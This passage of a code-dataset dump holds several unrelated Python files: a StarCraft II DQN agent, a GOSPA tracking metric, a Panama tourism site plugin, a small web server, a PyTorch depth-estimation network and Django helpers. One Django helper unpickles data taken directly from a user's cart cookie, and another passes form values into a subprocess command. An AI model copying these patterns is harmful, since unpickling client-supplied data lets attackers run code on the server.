actions.RAW_FUNCTIONS.Train_Zealot_quick(\"now\", gateway.tag)\n return actions.RAW_FUNCTIONS.no_op()\n\n def attack(self, obs):\n zealots = self.get_my_units_by_type(obs, units.Protoss.Zealot)\n if len(zealots) > 0:\n attack_xy = (38, 44) if self.base_top_left else (19, 23)\n distances = self.get_distances(obs, zealots, attack_xy)\n zealot = zealots[np.argmax(distances)]\n x_offset = random.randint(-4, 4)\n y_offset = random.randint(-4, 4)\n return actions.RAW_FUNCTIONS.Attack_pt(\n \"now\", zealot.tag, (attack_xy[0] + x_offset, attack_xy[1] + y_offset))\n return actions.RAW_FUNCTIONS.no_op()\n\nclass ProtossRandomAgent(ProtossAgentWithRawActsAndRawObs):\n def step(self, obs):\n super(ProtossRandomAgent, self).step(obs)\n action = random.choice(self.actions)\n return getattr(self, action)(obs)\n\nclass ProtossRLAgentWithRawActsAndRawObs(ProtossAgentWithRawActsAndRawObs):\n def __init__(self):\n super(ProtossRLAgentWithRawActsAndRawObs, self).__init__()\n\n self.s_dim = 21\n self.a_dim = 6\n\n self.lr = 1e-4 * 5\n self.batch_size = 256\n self.gamma = 1.0\n self.memory_size = 50000\n self.eps_max = 0.08\n self.eps_min = 0.01\n self.epsilon = 1.0\n self.init_sampling = 2000\n self.target_update_interval = 10\n\n self.data_file_qnet = 's10395_rlagent_with_vanilla_dqn_qnet'\n self.data_file_qnet_target = 's10395_rlagent_with_vanilla_dqn_qnet_target'\n\n self.qnetwork = NaiveMultiLayerPerceptron(input_dim=self.s_dim,\n output_dim=self.a_dim,\n num_neurons=[128],\n hidden_act_func='ReLU',\n out_act_func='Identity').to(device)\n\n self.qnetwork_target = NaiveMultiLayerPerceptron(input_dim=self.s_dim,\n output_dim=self.a_dim,\n num_neurons=[128],\n hidden_act_func='ReLU',\n out_act_func='Identity').to(device)\n\n if os.path.isfile(self.data_file_qnet + '.pt'):\n self.qnetwork.load_state_dict(torch.load(self.data_file_qnet + '.pt'))\n\n if os.path.isfile(self.data_file_qnet_target + '.pt'):\n self.qnetwork_target.load_state_dict(torch.load(self.data_file_qnet_target + '.pt'))\n\n # initialize target network same as the main network.\n self.qnetwork_target.load_state_dict(self.qnetwork.state_dict())\n\n self.dqn = DQN(state_dim=self.s_dim,\n action_dim=self.a_dim,\n qnet=self.qnetwork,\n qnet_target=self.qnetwork_target,\n lr=self.lr,\n gamma=self.gamma,\n epsilon=self.epsilon).to(device)\n\n self.memory = ExperienceReplayMemory(self.memory_size)\n\n self.print_every = 1\n self.cum_reward = 0\n self.cum_loss = 0\n self.episode_count = 0\n\n self.new_game()\n\n\n def reset(self):\n super(ProtossRLAgentWithRawActsAndRawObs, self).reset()\n self.new_game()\n\n def new_game(self):\n self.base_top_left = None\n self.previous_state = None\n self.previous_action = None\n self.cum_reward = 0\n self.cum_loss = 0\n\n # epsilon scheduling\n # slowly decaying_epsilon\n self.epsilon = max(self.eps_min, self.eps_max - self.eps_min * (self.episode_count / 200))\n self.dqn.epsilon = torch.tensor(self.epsilon).to(device)\n\n################################################################################여기서부터\n def get_state(self, obs):\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n idle_probes = [probe for probe in probes if probe.order_length == 0]\n nexus = self.get_my_units_by_type(obs, units.Protoss.Nexus)\n pylons = self.get_my_units_by_type(obs, units.Protoss.Pylon)\n completed_pylons = self.get_my_completed_units_by_type(\n obs, units.Protoss.Pylon)\n gateways = self.get_my_units_by_type(obs, units.Protoss.Gateway)\n completed_gateways = self.get_my_completed_units_by_type(\n obs, units.Protoss.Gateway)\n zealots = self.get_my_units_by_type(obs, units.Protoss.Zealot)\n\n queued_zealots = (completed_gateways[0].order_length\n if len(completed_gateways) > 0 else 0)\n\n free_pylon = (obs.observation.player.food_cap -\n obs.observation.player.food_used)\n can_afford_pylon = obs.observation.player.minerals >= 100\n can_afford_gateway = obs.observation.player.minerals >= 150\n can_afford_zealot = obs.observation.player.minerals >= 100\n\n enemy_probes = self.get_enemy_units_by_type(obs, units.Protoss.Probe)\n enemy_idle_probes = [probe for probe in enemy_probes if probe.order_length == 0]\n enemy_nexus = self.get_enemy_units_by_type(\n obs, units.Protoss.Nexus)\n enemy_pylons = self.get_enemy_units_by_type(\n obs, units.Protoss.Pylon)\n enemy_completed_pylons = self.get_enemy_completed_units_by_type(\n obs, units.Protoss.Pylon)\n enemy_gateways = self.get_enemy_units_by_type(obs, units.Protoss.Gateway)\n enemy_completed_gateways = self.get_enemy_completed_units_by_type(\n obs, units.Protoss.Gateway)\n enemy_zealots = self.get_enemy_units_by_type(obs, units.Protoss.Zealot)\n\n return (len(nexus),\n len(probes),\n len(idle_probes),\n len(pylons),\n len(completed_pylons),\n len(gateways),\n len(completed_gateways),\n len(zealots),\n queued_zealots,\n free_pylon,\n can_afford_pylon,\n can_afford_gateway,\n can_afford_zealot,\n len(enemy_nexus),\n len(enemy_probes),\n len(enemy_idle_probes),\n len(enemy_pylons),\n len(enemy_completed_pylons),\n len(enemy_gateways),\n len(enemy_completed_gateways),\n len(enemy_zealots))\n\n def step(self, obs):\n super(ProtossRLAgentWithRawActsAndRawObs, self).step(obs)\n\n #time.sleep(0.5)\n\n state = self.get_state(obs)\n state = torch.tensor(state).float().view(1, self.s_dim).to(device)\n action_idx = self.dqn.choose_action(state)\n action = self.actions[action_idx]\n done = True if obs.last() else False\n\n if self.previous_action is not None:\n experience = (self.previous_state.to(device),\n torch.tensor(self.previous_action).view(1, 1).to(device),\n torch.tensor(obs.reward).view(1, 1).to(device),\n state.to(device),\n torch.tensor(done).view(1, 1).to(device))\n self.memory.push(experience)\n\n self.cum_reward += obs.reward\n self.previous_state = state\n self.previous_action = action_idx\n\n if obs.last():\n self.episode_count = self.episode_count + 1\n\n if len(self.memory) >= self.init_sampling:\n # training dqn\n sampled_exps = self.memory.sample(self.batch_size)\n sampled_exps = prepare_training_inputs(sampled_exps, device)\n self.dqn.learn(*sampled_exps)\n\n if self.episode_count % self.target_update_interval == 0:\n self.dqn.qnet_target.load_state_dict(self.dqn.qnet.state_dict())\n\n if self.episode_count % self.print_every == 0:\n msg = (self.episode_count, self.cum_reward, self.epsilon)\n print(\"Episode : {:4.0f} | Cumulative Reward : {:4.0f} | Epsilon : {:.3f}\".format(*msg))\n\n torch.save(self.dqn.qnet.state_dict(), self.data_file_qnet + '.pt')\n torch.save(self.dqn.qnet_target.state_dict(), self.data_file_qnet_target + '.pt')\n\n #writer.add_scalar(\"Loss/train\", self.cum_loss/obs.observation.game_loop, self.episode_count)\n #writer.add_scalar(\"Score\", self.cum_reward, self.episode_count)\n\n return getattr(self, action)(obs)\n\ndef main(unused_argv):\n agent1 = ProtossRLAgentWithRawActsAndRawObs()\n try:\n with sc2_env.SC2Env(\n map_name=\"Simple64\",\n players=[sc2_env.Agent(sc2_env.Race.protoss),\n sc2_env.Bot(sc2_env.Race.protoss,\n sc2_env.Difficulty.very_easy)],\n agent_interface_format=features.AgentInterfaceFormat(\n action_space=actions.ActionSpace.RAW,\n use_raw_units=True,\n raw_resolution=64,\n ),\n step_mul=8,\n disable_fog=True,\n visualize=False\n ) as env:\n run_loop.run_loop([agent1], env, max_episodes=1000)\n except KeyboardInterrupt:\n pass\n\nif __name__ == \"__main__\":\n app.run(main)\n","sub_path":"code/10.agent_tournaments/s10395/sc2/agent/protoss_DRLAgentWithVanillaDQN.py","file_name":"protoss_DRLAgentWithVanillaDQN.py","file_ext":"py","file_size_in_byte":16726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407091140","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nlast mod 5/17/18\n\"\"\"\nimport scipy.optimize as spopt\nimport numpy as np\n\ndef overlap(a, b):\n xdiff = a[0]-b[0]\n ydiff = a[1]-b[1]\n return b[2] > xdiff and a[2] > -xdiff and b[3] > ydiff and a[3] > -ydiff\n\ndef IoU(a, b):\n if not overlap(a,b): return 0\n areaA = a[2]*a[3]\n areaB = b[2]*b[3]\n I = (min(a[0]+a[2], b[0]+b[2]) - max(a[0], b[0])) *\\\n (min(a[1]+a[3], b[1]+b[3]) - max(a[1], b[1]))\n return I / (areaA + areaB - I)\n\ndef minusIoU(a, b): return 1 - IoU(a, b)\n\ndef GOSPA(X, Y, p=1, c=1., costFun = minusIoU):\n m = len(X)\n n = len(Y)\n if m > n:\n return GOSPA(Y, X, p, c, costFun)\n if m == 0:\n return c**p / 2. * n\n costs = np.array([[costFun(Xi , Yj) for Yj in Y] for Xi in X])\n costs = np.minimum(costs, c) ** p\n row_ind, col_ind = spopt.linear_sum_assignment(costs)\n return np.sum(costs[row_ind, col_ind]) + c**p / 2. * (n-m)","sub_path":"MWO/pedestrian/gospa.py","file_name":"gospa.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"174077016","text":"#coding:utf-8\n\n\"\"\"\n Used for the que_hacer.html page and the extra items on the index.html page.\n\"\"\"\ndef activities_index_array():\n activities = [\n dict(\n title=\"Lo Más Destacado\",\n subtitle=\"Las mejores y más conocidas atracciones de Panamá\",\n url='/que_hacer/destacado.html',\n picture='/images/hacer/destacado.jpg',\n package_image='/images/packages/7.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Cultura\",\n subtitle=\"Vive una experiencia como ninguna otra y conoce todo de Panamá\",\n url='/que_hacer/cultura.html',\n picture='/images/hacer/cultura.jpg',\n package_image='/images/packages/5.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"Historia\",\n subtitle=\"Historias que te transportarán a las diferentes épocas\",\n url='/que_hacer/historia.html',\n picture='/images/hacer/historia.jpg',\n package_image='/images/packages/6.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"Naturaleza\",\n subtitle=\"Encantadoras y relajantes playa, Selvas tropicales y grandes ríos\",\n url='/que_hacer/naturaleza.html',\n picture='/images/hacer/naturaleza.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Aventura\",\n subtitle=\"Disfruta de los más divertidos deportes y realizando ecoturismo\",\n url='/que_hacer/aventura.html',\n picture='/images/hacer/aventura.jpg',\n package_image='/images/packages/2.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Gastronomía\",\n subtitle=\"Prepara tu paladar para probar los más exquisitos platos típicos e internacionales\",\n url='/que_hacer/gastronomia.html',\n picture='/images/hacer/gastronomia.jpg',\n package_image='/images/packages/4.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Deportes\",\n subtitle=\"Saca el atleta que llevas dentro practicando tus deportes favoritos\",\n url='/que_hacer/deportes.html',\n picture='/images/hacer/deportes.jpg',\n package_image='/images/packages/20.jpg',\n extra_class='playa montana'\n ),\n dict(\n title=\"Vida Nocturna\",\n subtitle=\"Experimenta una increíble vida nocturna en diferentes zonas del país\",\n url='/que_hacer/vida_nocturna.html',\n picture='/images/hacer/nocturna.jpg',\n package_image='/images/packages/3.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Compras\",\n subtitle=\"Los mejores descuentos en exclusivas marcas\",\n url='/que_hacer/compras.html',\n picture='/images/hacer/compras.jpg',\n package_image='/images/packages/1.jpg',\n extra_class='ciudad'\n ),\n ]\n return activities\n\ndef activities_index_array_en():\n activities = [\n dict(\n title=\"Must See\",\n subtitle=\"The best and most popular attractions in Panama\",\n url='/en/to_do_list/must_see.html',\n picture='/images/hacer/destacado.jpg',\n package_image='/images/packages/7.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Culture\",\n subtitle=\"Live an experience like no one else and get to know the whole of Panama\",\n url='/en/to_do_list/culture.html',\n picture='/images/hacer/cultura.jpg',\n package_image='/images/packages/5.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"History\",\n subtitle=\"Stories that transport you to different times\",\n url='/en/to_do_list/history.html',\n picture='/images/hacer/historia.jpg',\n package_image='/images/packages/6.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"Nature\",\n subtitle=\"Relish the exhuberant biodiversity\",\n url='/en/to_do_list/nature.html',\n picture='/images/hacer/naturaleza.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Adventure\",\n subtitle=\"Enjoy the most fun sports and do ecotourism\",\n url='/en/to_do_list/adventure.html',\n picture='/images/hacer/aventura.jpg',\n package_image='/images/packages/2.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Gastronomy\",\n subtitle=\"Prepare your palate to taste the most exquisite local and international dishes\",\n url='/en/to_do_list/gastronomy.html',\n picture='/images/hacer/gastronomia.jpg',\n package_image='/images/packages/4.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Sports\",\n subtitle=\"Bring out the athlete in you practicing your favorite sports\",\n url='/en/to_do_list/sports.html',\n picture='/images/hacer/deportes.jpg',\n package_image='/images/packages/20.jpg',\n extra_class='playa montana'\n ),\n dict(\n title=\"Night Life\",\n subtitle=\"Experience an incredible nightlife in different areas of the country\",\n url='/en/to_do_list/night_life.html',\n picture='/images/hacer/nocturna.jpg',\n package_image='/images/packages/3.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Shopping\",\n subtitle=\"The best discounts on exclusive brands\",\n url='/en/to_do_list/shopping.html',\n picture='/images/hacer/compras.jpg',\n package_image='/images/packages/1.jpg',\n extra_class='ciudad'\n ),\n ]\n return activities\n\n\ndef preBuildPage(page, context, data):\n\n # Updates the context of the page to include ACTIVITIES_LIST\n context.update({\"ACTIVITIES_LIST\": activities_index_array()})\n context.update({\"ACTIVITIES_LIST_EN\": activities_index_array_en()})\n return context, data\n","sub_path":"plugins/context_activities.py","file_name":"context_activities.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49746965","text":"import pickle\nimport base64\nfrom django_redis import get_redis_connection\n\n\ndef merge_cart_cookie_to_redis(request, user, response):\n \"\"\"\n 合并请求用户的购物车数据,将未登录保存��cookie里的保存到redis中\n :param request: 用户的请求对象\n :param user: 当前登录的用户\n :param response: 响应对象,用于清楚购物车cookie\n :return:\n \"\"\"\n cookie_cart = request.COOKIES.get('cart')\n if cookie_cart is not None:\n cookie_cart = pickle.loads(base64.b64decode(cookie_cart.encode()))\n redis_conn = get_redis_connection('cart')\n redis_cart = redis_conn.hgetall('cart_%s' % user.id)\n redis_cart_selected = redis_conn.smembers('cart_selected_%s' % user.id)\n cart = {}\n for sku_id, count in redis_cart.items():\n cart[int(sku_id)] = int(count)\n\n for sku_id, count_selected_dict in cookie_cart.items():\n cart[sku_id] = count_selected_dict['count']\n if count_selected_dict['selected']:\n redis_cart_selected.add(sku_id)\n\n if cart:\n pl = redis_conn.pipeline()\n pl.hmset('cart_%s' % user.id, cart)\n pl.sadd('cart_selected_%s' % user.id, *redis_cart_selected)\n pl.execute()\n\n response.delete_cookie('cart')\n\n return response\n\n","sub_path":"meiduo_mall/meiduo_mall/apps/carts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116869961","text":"import http.server\nimport socketserver\nimport webbrowser\nimport os\nfrom threading import Thread\n\nclass MyRequestHandler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n rootdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'interface/') #file location \n os.chdir(rootdir)\n print(self.path, 'serving...')\n return http.server.SimpleHTTPRequestHandler.do_GET(self)\n\n\ndef window(PORT):\n #open a public URL, in this case, the webbrowser docs\n url = \"http://localhost:\" + str(PORT)\n webbrowser.get(using='google-chrome').open(url)\n\n\ndef render():\n PORT = 9900\n Handler = MyRequestHandler\n\n browser = Thread(target=window, args=(PORT,))\n browser.setDaemon(True)\n browser.start()\n\n with socketserver.TCPServer((\"\", PORT), Handler) as httpd:\n print(\"serving at port\", PORT)\n httpd.serve_forever()\n\n","sub_path":"numflow/numflow/renderer/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448285088","text":"def odd_even_project() :\n number = input(\"Enter a number :\")\n while number != \"x\":\n\n try:\n number = int(number)\n if number%2 == 0 :\n print(\"It's an even number =)\")\n else :\n print(\"It's an odd number :)\")\n except ValueError:\n print(\"Please Enter a valid number\")\n\n number = input(\"Enter a number again , and if you wanna exit press 'x' :\")","sub_path":"First_project.py","file_name":"First_project.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129469008","text":"import os\nimport subprocess\n\nfrom django.utils import simplejson\nfrom dajaxice.decorators import dajaxice_register\nfrom dajaxice.utils import deserialize_form\nfrom dajax.core import Dajax\n\nfrom daemons.base_daemon import Daemon\nfrom project_settings import JSON_PATH, FEEDS_OUTPUT_PATH, DAEMON_PATH\nfrom ipmanager.forms import DaemonControlsForm\n\n\n@dajaxice_register\ndef get_daemon_status(request):\n dajax = Dajax()\n status = Daemon(60, 'ERROR').status()\n if status == 'Running':\n dajax.remove_css_class('#daemon_status', 'stopped')\n dajax.add_css_class(\"#daemon_status\", 'running')\n else:\n dajax.remove_css_class('#daemon_status', 'running')\n dajax.add_css_class('#daemon_status', 'stopped')\n return simplejson.dumps({'status': status})\n\n\n@dajaxice_register\ndef get_daemon_json(request):\n json_path = os.path.join(JSON_PATH, 'loaderd.json')\n if os.path.isfile(json_path):\n data = simplejson.load(open(json_path))\n return simplejson.dumps(data)\n else:\n return simplejson.dumps({u'loglevel': u'DEBUG', u'timeout': 25,\n u'output_dir': FEEDS_OUTPUT_PATH})\n\n\n@dajaxice_register\ndef send_daemon_form(request, form):\n dajax = Dajax()\n form = DaemonControlsForm(deserialize_form(form))\n if form.is_valid():\n for field in form.fields:\n dajax.assign('#%s_error' % field, 'innerHTML', '')\n daemon_temp = Daemon(60, 'ERROR')\n if daemon_temp.status() == 1:\n daemon_temp.stop()\n dajax.remove_css_class('#daemon_status', 'running')\n dajax.add_css_class('#daemon_status', 'stopped')\n dajax.assign(\"#daemon_status\", \"innerHTML\", \"Not running\")\n else:\n dajax.remove_css_class('#daemon_status', 'stopped')\n dajax.add_css_class('#daemon_status', 'running')\n dajax.assign(\"#daemon_status\", \"innerHTML\", \"Running\")\n timeout = form.cleaned_data['timeout']\n loglevel = form.cleaned_data['loglevel']\n output_dir = form.cleaned_data['output_dir']\n cmd = './loaderd.py start -t %s -o %s --loglevel %s' % (\n timeout, output_dir, loglevel\n )\n subprocess.Popen(cmd.split(), cwd=DAEMON_PATH)\n else:\n for error in form.errors.items():\n dajax.assign('#%s_error' % error[0], 'innerHTML', error[1])\n return dajax.json()\n","sub_path":"web/ipconflux/ipmanager/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483292759","text":"import torchvision\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom torch.autograd import Variable, Function\n\nclass ConvBlock(nn.Module):\n \"\"\"\n Helper module that consists of a Conv -> BN -> ReLU\n \"\"\"\n\n def __init__(self, in_channels, out_channels, padding=1, kernel_size=3, stride=1, with_nonlinearity=True, use_bn=True):\n super(ConvBlock, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, padding=padding, kernel_size=kernel_size, stride=stride)\n self.bn = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU() #Leaky\n self.with_nonlinearity = with_nonlinearity\n self.use_bn = use_bn\n def forward(self, x):\n x = self.conv(x)\n if self.use_bn: \n x = self.bn(x)\n if self.with_nonlinearity:\n x = self.relu(x)\n return x\n\n\nclass Bridge(nn.Module):\n \"\"\"\n This is the middle layer of the UNet which just consists of some\n \"\"\"\n\n def __init__(self, in_channels, out_channels):\n super(Bridge, self).__init__()\n self.bridge = nn.Sequential(\n ConvBlock(in_channels, out_channels),\n ConvBlock(out_channels, out_channels)\n )\n\n def forward(self, x):\n return self.bridge(x)\n\n\nclass UpBlockForUNetWithResNet50(nn.Module):\n \"\"\"\n Up block that encapsulates one up-sampling step which consists of Upsample -> ConvBlock -> ConvBlock\n \"\"\"\n\n def __init__(self, in_channels, out_channels, up_conv_in_channels=None, up_conv_out_channels=None,\n upsampling_method=\"conv_transpose\"):\n super(UpBlockForUNetWithResNet50, self).__init__()\n\n if up_conv_in_channels == None:\n up_conv_in_channels = in_channels\n if up_conv_out_channels == None:\n up_conv_out_channels = out_channels\n\n if upsampling_method == \"conv_transpose\":\n self.upsample = nn.ConvTranspose2d(up_conv_in_channels, up_conv_out_channels, kernel_size=2, stride=2)\n elif upsampling_method == \"bilinear\":\n self.upsample = nn.Sequential(\n nn.Upsample(mode='bilinear', scale_factor=2),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1)\n )\n self.conv_block_1 = ConvBlock(in_channels, out_channels)\n self.conv_block_2 = ConvBlock(out_channels, out_channels)\n\n def forward(self, up_x, down_x):\n \"\"\"\n :param up_x: this is the output from the previous up block\n :param down_x: this is the output from the down block\n :return: upsampled feature map\n \"\"\"\n x = self.upsample(up_x)\n x = torch.cat([x, down_x], 1)\n x = self.conv_block_1(x)\n x = self.conv_block_2(x)\n return x\n\n# class DepthDiscriminatorBlock(nn.Module):\n# \"\"\"\n# Up block that encapsulates one up-sampling step which consists of Upsample -> ConvBlock -> ConvBlock\n# \"\"\"\n\n# def __init__(self, in_channels, out_channels, kernel_size=5, stride=2):\n# super(DepthDiscriminatorBlock, self).__init__()\n\n# self.discrim_conv = ConvBlock(in_channels, out_channels, kernel_size=kernel_size, stride=stride)\n# # self.discrim_relu = nn.LeakyReLU()\n# # self.discrim_drop = nn.Dropout()\n\n# def forward(self, x):\n# \"\"\"\n# :param up_x: this is the output from the previous up block\n# :param down_x: this is the output from the down block\n# :return: upsampled feature map\n# \"\"\"\n# x = self.discrim_conv(x)\n# # x = self.discrim_relu(x)\n# # x = self.discrim_drop(x)\n# return x\n\n\n\n# net = lrelu(slim.conv2d(images, 64, 5, stride=2, normalizer_fn=None))\n# net = lrelu(slim.conv2d(net, 128, 5, stride=2))\n# net = lrelu(slim.conv2d(net, 256, 5, stride=2))\n# net = lrelu(slim.conv2d(net, 512, 5, stride=2)) # shape = (batch, 7, 7, 512)\n# net = tf.reshape(net, [-1, (112 / 2**4)**2 * 512])\n\nclass GradReverse(Function):\n def __init__(self, lambd):\n self.lambd = lambd\n\n def forward(self, x):\n return x.view_as(x)\n\n def backward(self, grad_output):\n return (grad_output * self.lambd)\n\ndef grad_reverse(x, lambd):\n return GradReverse(lambd)(x)\n\n\nclass DepthNet(nn.Module):\n\n def __init__(self, pre_trained, n_channels=3, n_classes=10, depth = 6, ksize=7):\n super(DepthNet, self).__init__()\n # resnet = torchvision.models.resnet.resnet50(pretrained=True)\n down_blocks = []\n up_blocks = []\n discriminator_blocks = []\n self.ksize = ksize\n self.relu = nn.ReLU()\n self.depth = depth\n self.input_block = nn.Sequential(*list(pre_trained.children())[:3])\n self.input_pool = list(pre_trained.children())[3]\n for bottleneck in list(pre_trained.children()):\n if isinstance(bottleneck, nn.Sequential):\n down_blocks.append(bottleneck)\n self.down_blocks = nn.ModuleList(down_blocks)\n\n self.avgpool = pre_trained.avgpool\n\n # self.down = nn.Linear(2048*7*7, )\n self.down_bottleneck = nn.Linear(pre_trained.fc.in_features, 256)\n\n\n self.up_bottleneck = nn.Linear(256 + n_classes, pre_trained.fc.in_features * ksize * ksize)\n\n # self.up_dec = nn.Linear(pre_trained.fc.in_features, pre_trained.fc.in_features * 7 * 7)\n\n self.bridge = Bridge(2048, 2048)\n\n\n up_blocks.append(UpBlockForUNetWithResNet50(2048, 1024))\n up_blocks.append(UpBlockForUNetWithResNet50(1024, 512))\n up_blocks.append(UpBlockForUNetWithResNet50(512, 256))\n up_blocks.append(UpBlockForUNetWithResNet50(in_channels=128 + 64, out_channels=128,\n up_conv_in_channels=256, up_conv_out_channels=128))\n up_blocks.append(UpBlockForUNetWithResNet50(in_channels=64 + 3, out_channels=64,\n up_conv_in_channels=128, up_conv_out_channels=64))\n\n self.up_blocks = nn.ModuleList(up_blocks)\n\n self.out = nn.Conv2d(64, n_channels, kernel_size=1, stride=1)\n\n # discriminator_blocks.append(DepthDiscriminatorBlock(3, 64))\n # discriminator_blocks.append(DepthDiscriminatorBlock(64, 128))\n # discriminator_blocks.append(DepthDiscriminatorBlock(128, 256))\n # discriminator_blocks.append(DepthDiscriminatorBlock(256, 512))\n\n # self.discriminator_blocks\n\n # self.discriminator_blocks = nn.Sequential(ConvBlock(3, 64, padding=1, kernel_size=5, stride=2, use_bn=False),\n # ConvBlock(64, 128, padding=1, kernel_size=5, stride=2),\n # ConvBlock(128, 256, padding=1, kernel_size=5, stride=2),\n # ConvBlock(256, 512, padding=1, kernel_size=5, stride=2),\n # ConvBlock(512, 512, padding=1, kernel_size=5, stride=2))\n\n # self.discriminate = nn.Linear(6*6*512, 1)\n\n self.domain_pred = nn.Sequential(nn.Linear(2048, 2048), nn.ReLU(True), nn.Dropout(),\n # nn.Linear(3072, 2048), nn.ReLU(True), nn.Dropout(),\n nn.Linear(2048, 1))\n\n self.domain_pred_conditional = nn.Sequential(nn.Linear(256, 2048), nn.ReLU(True), nn.Dropout(),\n # nn.Linear(3072, 2048), nn.ReLU(True), nn.Dropout(),\n nn.Linear(2048, 1))\n # # self.discriminator = nn.Sequential(nn.Linear(256, 3072), nn.ReLU(True), nn.Dropout(0.2),\n # nn.Linear(3072, 2048), nn.ReLU(True), nn.Dropout(0.2),\n # nn.Linear(2048, 1))\n\n def forward(self, x, x2=None, train_discrim=False, train_gen=False, train_conditional_gen=False, train_net=False, train_dom=False, train_conditional_dom=False, with_output_feature_map=False, l=1, classonehot=[]):\n\n # if train_discrim:\n\n # dis = self.discriminator_blocks(x).squeeze()\n # # dis = dis.view(-1, 6*6*512)\n # # dis = self.discriminate(dis)\n\n # return dis\n\n\n if train_gen:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n # z = self.disc_pool(x)\n x = self.bridge(x)\n\n for i, block in enumerate(self.up_blocks, 1):\n k = self.depth - 1 - i\n key = \"layer_\"+str(k)\n x = block(x, pre_pools[key])\n output_feature_map = x\n depth_gen = self.out(x)\n del pre_pools\n\n\n if with_output_feature_map:\n return depth_gen, output_feature_map\n else:\n return depth_gen\n\n elif train_conditional_gen:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n x = self.avgpool(x)\n x = x.view(x.size(0),-1)\n x = self.down_bottleneck(x)\n class_x = torch.cat([classonehot,x], dim=1)\n class_x = self.up_bottleneck(class_x)\n class_x = self.relu(class_x)\n class_x = class_x.view(class_x.size(0),-1, self.ksize, self.ksize)\n # print(\"Before Bridge:\",x)\n # x = self.bridge(x)\n # print(\"After Bridge:\",x)\n\n for i, block in enumerate(self.up_blocks, 1):\n k = self.depth - 1 - i\n key = \"layer_\"+str(k)\n class_x = block(class_x, pre_pools[key])\n output_feature_map = class_x\n depth_gen = self.out(class_x)\n del pre_pools\n\n\n if with_output_feature_map:\n return depth_gen, output_feature_map\n else:\n return depth_gen\n \n elif train_dom:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n # print(\"x\",x)\n # bridge = self.bridge(x)\n bridge = self.avgpool(x)\n bridge = bridge.view(bridge.size(0),-1)\n # print(\"bridge\",bridge)\n bridge_reverse = grad_reverse(bridge, l*-1)\n # print(\"bridge_reverse\",bridge_reverse)\n dom_pred = self.domain_pred(bridge_reverse)\n\n\n # for i, block in enumerate(self.up_blocks, 1):\n # k = self.depth - 1 - i\n # key = \"layer_\"+str(k)\n # x = block(x, pre_pools[key])\n # output_feature_map = x\n # depth_gen = self.out(x)\n # del pre_pools\n\n elif train_conditional_dom:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n # print(\"x\",x)\n # bridge = self.bridge(x)\n x = self.avgpool(x)\n x = x.view(x.size(0),-1)\n x = self.down_bottleneck(x)\n # print(\"bridge\",bridge)\n x_reverse = grad_reverse(x, l*-1)\n # print(\"bridge_reverse\",bridge_reverse)\n dom_pred = self.domain_pred_conditional(x_reverse)\n\n # for i, block in enumerate(self.up_blocks, 1):\n # k = self.depth - 1 - i\n # key = \"layer_\"+str(k)\n # x = block(x, pre_pools[key])\n # output_feature_map = x\n # depth_gen = self.out(x)\n # del pre_pools\n\n return dom_pred.squeeze()\n # elif train_net:\n\n # pre_pools = dict()\n # pre_pools[\"layer_0\"] = x\n # x = self.input_block(x)\n # pre_pools[\"layer_1\"] = x\n # x = self.input_pool(x)\n\n # for i, block in 